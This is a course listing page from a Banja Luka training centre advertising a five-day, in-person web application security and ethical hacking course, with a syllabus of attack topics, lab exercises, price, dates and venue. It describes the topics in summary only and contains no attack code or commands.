facebook

Kurs:

Web application (in)security

Napredni

40 časova

Materijali sa predavanja

Sertifikat o pohađanju kursa

Zašto ovaj kurs?

Ovaj kurs vodi polaznike kroz područje hakovanja web aplikacija. Prvi dio kursa, koji traje 3 dana, pruža uvide u protokole, alate i uobičajene vektore napada povezane sa web aplikacijama, uključujući odgovarajuće demonstracije i objašnjenja tih napada. Drugi dio kursa, koji traje 2 dana, pruža polaznicima mogućnost da učvrste svoje znanje kroz praktično iskustvo u virtuelnom laboratorijskom okruženju.

Kurs obuhvata temeljno istraživanje često korištenih i široko prepoznatih napada, kako na serverskoj, tako i na klijentskoj strani web aplikacija. Bavi se serverskim injekcijama, kao što su SQL injection, LDAP injection i OS command injection. Takođe, istražuje klijentske injekcije, uključujući cross-site scripting (XSS) i cross-site request forgery (CSRF). Pored toga, kurs će se baviti napadima na autentifikaciju, pokrivajući teme poput probijanja lozinki i tehnika za zaobilaženje procesa prijave. Takođe će istražiti napade na autorizaciju, uključujući insecure direct object reference i zloupotrebu API-ja. Pored toga, polaznici će sticanjem znanja o logičkim napadima dobiti dragocjene uvide u zanimljive scenarije napada otkrivene tokom testiranja prodiranja.

Da bi se steklo sveobuhvatno razumijevanje hakovanja i bezbjednosti, ključno je istražiti kompleksne mehanizme računarskih sistema. Stoga kurs uključuje istraživanje buffer overflow. Osim toga, kurs će se završiti serijom studija slučaja, fokusiranih na vektor napada lanca snabdijevanja i napada putem široko korištenih aplikacija poput Atlassian Confluence i VMware vCenter Servera. Ovaj segment omogućava polaznicima da shvate probleme vezane za nepravilno održavanje aplikacija, Log4J ranjivost i napade lanca snabdijevanja, pružajući dragojcene uvide u stvarne scenarije i unaprijeđujući vještine suočavanja sa izazovima koji se javljaju.

Cloud, DevSecOps i CI/CD su sadašnjost i vjerovatno dugoročni dio budućnosti razvoja i implementacije aplikacija. Razumijevanje bezbjednosnih rizika CI/CD procesa je imperativ za sve programere. U okviru kursa pokrićemo najvažnije bezbjednosne rizike u CI/CD procesu i definisati zaštitne mjere koje se mogu primijeniti.

Ovaj kurs će biti izuzetno koristan za sve koji su uključeni u razvoj web aplikacija, a žele da razumiju odgovarajuće vektore napada i ranjivosti, kako bi bolje dizajnirali i razvijali web aplikacije.

Sigurnost Web Aplikacija

Kome je namijenjen ovaj kurs?

Kurs je namijenjen osobama koje su zainteresovane za razumijevanje napada na web aplikacije i tehnika zaštite, svima koji su zainteresovani za probleme vezane za web tehnologije koji pomažu zlonamjernim korisnicima da ih ugroze, svima koji su zainteresovani za etičko hakovanje, Software developere, DEVOps specialiste, analitičare bezbjednosti, stručnjake za bezbjednost, sistem inženjere, mrežne administratore, IT profesionalce, bezbjednosne konsultante i drugim odgovornim za bezbjedan razvoj, implementaciju, održavanje i opštu bezbjednost.

Preduslovi:

Poželjno je osnovno poznavanje programiranja, ali nije obavezno jer se obuka ne oslanja na duboko kodiranje aplikacija, razumijevanje osnova kodiranja i principa implementacije web aplikacija, razumijevanje principa mrežnog povezivanja, arhitekture i protokola je poželjno, razumijevanje osnovne upotrebe i administracije Windows i Linux operativnih sistema.

Kali Linux će se koristiti za veći dio LAB-ova, osnovno poznavanje navigacije i korišćenja Linux OS-a je obavezno.

Dodatna napomena: 

Ovaj kurs nije moguće pohađati online.

Plan i program kursa:

1. Security concepts

In this short, introductory module, participants will learn about basic security concepts such as the CIA and DAD triangle, Defense in depth, etc. Current risks and threats will be discussed too.

2. Overview of the web technologies and frameworks

This module sets foundations for the rest of the course. Participants will learn about the web technologies that are most used today, such as Java, .NET, PHP, the HTTP protocol itself, and session Cookies. The fundamental problems related to web application insecurity will be outlined.

3. OWASP and the tools to have on hand

OWASP top 10 and OWASP testing guide will be discussed in this module. To be able to assess a web application’s security, one must understand the protocols used (discussed earlier) and the tools, such as web debugging proxies, that can help in identifying inputs and errors in the tested web application. By using a web debugging proxy (like Burp, ZAP, Web Scarab, Fiddler, etc.) one can easily map the application and identify the parameters used.
Hands-on exercise*: During the exercise, participants will use the burp proxy to map the web application, and the ZAP proxy (free tool) for automated scanning and file/directory enumeration (forced browsing).

4. Security risks of CI/CD

This module covers top security risks to CI/CD pipeline and reviews protections that can be used to defend CI/CD environments, based on CISA recommendations.

5. Bypassing client-side controls

The critical vulnerability vector in web applications today is trust in the client input. Client-side controls and their evasions are thoroughly reviewed in this module.
Hands-on exercise*: Participants will have the opportunity to change the web application’s behavior by modifying client-side data with the Burp or ZAP proxy debugging tool.

6. Authentication attacks

This module will explain different authentication mechanisms (HTML form-based authentication, multifactor authentication, client and server-side certificates and smartcards, HTTP basic and digest authentication, Windows integrated authentication, etc.). PKI (public key infrastructure), one of the most important concepts related to authentication and secure communication over the Internet, will be explained in more detail. Use of the Burp debugging proxy to perform brute force attacks against a web application will be presented, including the use of the Hydra and wfuzz tools to accomplish the same result.

7. Web application attacks: Injection

This module defines and explains different injection attacks like: SQL injection, LDAP injection, and OS command injection. Participants will understand the level of access that attackers can gain by utilizing them.
Hands-on exercise*: During the exercise, participants will have an opportunity to try different injection attacks. sqlmap will be used as a tool to perform SQL injection attacks, while wfuzz will be used to identify entry points.

8. Web application attacks: XSS/CSRF

This is another injection example. In this module, various XSS (Cross-Site-Scripting) types (stored, reflected, DOM based) will be outlined. Additional attention is given to CSRF (Cross-Site Request Forgery) attacks and ways to prevent them. To demonstrate how XSS vulnerabilities can be dangerous, the BeeF attack framework is utilized.
Hands-on exercise*: During the exercise, participants will use an XSS vulnerability to steal the session information and impersonate the vulnerable application’s administrator through XSS vulnerability.

9. Web application attacks: Broken access control

HTTP protocol is by design unsecured, connectionless protocol. This module covers typical session management issues.
Hands-on exercise*: The exercise will demonstrate how a user’s session can be hijacked by stealing cookies and the problems resulting from using the parameters for session management.

10. Web application attacks: Insecure direct object references

Most security issues are still caused by insecure object references and inadequate controls implemented when users access different objects. The IDOR (Insecure Direct Object References) problems are explained in this module.
Hands-on exercise*: The exercise demonstrates how inadequately implemented controls can lead to the loss of sensitive information or even the elevation of privilege.

11. Web application attacks: Security misconfiguration

Every application depends on the infrastructure it has been implemented on. If any software is outdated or unnecessary features are enabled, an attacker can abuse this and gain access to the target web application or website. Quite often, improper error handling can leak sensitive data to the attacker, or the attacker can retrieve sensitive information from incorrectly configured web servers. This module provides several interesting examples.
Hands-on exercise*: An incorrectly configured server is introduced as a part of the exercise, during which participants will gain access to sensitive files by using the application with poorly configured credentials.

12. Web Application attacks: Web services and API attacks

Today, web services play a crucial role in Web Application security and usage. Having unprotected web services exposes the infrastructure to further attacks. The rise of the APIs (Application Programming Interfaces) usage during the last decade revived IDOR and, at the same time, helped to augment authentication and authorization related attacks. In this chapter, attacks to web services and APIs and their prevention will be reviewed.
Hands-on exercise*: Participants will attack poorly configured API to gain access to unprotected features and compromise the application.

13. Logical flaws

Maybe the most dangerous errors in web applications are related to the application’s logic. Even well-written web applications with high and tightened security have been hacked because of the flaws in the application logic that permit something that the developer did not intend. Usually, logical flows will give an attacker privileged access to applications and data, thus circumventing highly secure systems. Those kinds of errors will be reviewed during this module, including the walkthrough for some real-world examples.

14. BoF - Buffer overflow

Talking about web application security and security in general without mentioning BoF is like you start to watch a movie 30 minutes after the projection starts. During this module, participants will get insight into how BoF works
Hands-on exercise*: Participants will prepare and write BoF from scratch (starting with simple fuzzing to the reverse shell).

SERTIFIKACIJA
  • Polaznicima pripada sertifikat o pohađanju kursa Web application (in)security za ostvarenih minimalno 70% prisustva od ukupnog fonda časova.

1700,00 KM

    Preferirani način praćenja kursa


    *Ukoliko nemate promo kod ostavite prazno polje.

    Cijena je bez PDV-a.

    Cilj kursa je da naučiš

    R

    Osnovni koncepti bezbjednosti

    R

    Bezbjednosni aspekti web tehnologija

    R

    Kako web aplikacije mogu biti napadnute i kako se odbraniti od tih napada

    R

    Osnove BoF (Buffer Overflow)

    R

    Vrste napada na autentifikaciju

    R

    Vrste napada na web aplikacije (Injection (A1), XSS/CSRF (A3/A8), Broken authentication and session management (A2))

    Šta dobijam?

    Pristup kursu u trajanju od 40 časova

    Materijale sa predavanja

    Sertifikat o pohađanju kursa

    Detaljne informacije

    Početak:
    13. maj 2024.
    Kraj:
    17. maj 2024.
    pon
    uto
    sri
    čet
    pet
    08:00-16:00
    40 časova
    LANACO Tehnološki centar
    Veljka Mlađenovića bb
    Banja Luka
    (krug Poslovne zone Incel)
    Nemogućnost praćenja online

    Možda te zanima

    Share This